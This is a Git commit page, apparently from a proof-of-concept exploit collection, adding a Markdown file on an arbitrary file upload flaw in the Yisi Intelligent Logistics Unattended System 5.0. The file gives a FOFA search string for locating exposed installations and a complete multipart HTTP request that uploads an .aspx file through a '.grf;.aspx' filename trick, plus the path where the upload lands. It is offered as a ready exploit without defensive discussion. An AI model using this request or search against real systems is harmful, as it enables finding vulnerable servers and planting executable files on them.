admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 易思智能物流无人值守系统5.0存在任意文件上传漏洞.md

Browse Source
This commit is contained in:
wy876 2023-12-05 19:43:43 +08:00 committed by GitHub
parent dae40c152c
commit 1b68c3acb2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
易思智能物流无人值守系统5.0存在任意文件上传漏洞.md Normal file
View File

@ -0,0 +1,27 @@
## 易思智能物流无人值守系统5.0存在任意文件上传漏洞
## fofa
```
"智能物流无人值守系统"
```
## exp
```
POST /Sys_ReportFile/ImportReport?encode=717132 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 199
Content-Type: multipart/form-data; boundary=59d3d0b126080d21572c9e7a77d89931
--59d3d0b126080d21572c9e7a77d89931
Content-Disposition: form-data; name="file"; filename="1234.grf;.aspx"
Content-Type: application/octet-stream
304674859
--59d3d0b126080d21572c9e7a77d89931--
```
上传成功后,会返回路径 http://127.0.0.1/GRF/Custom/717132.aspx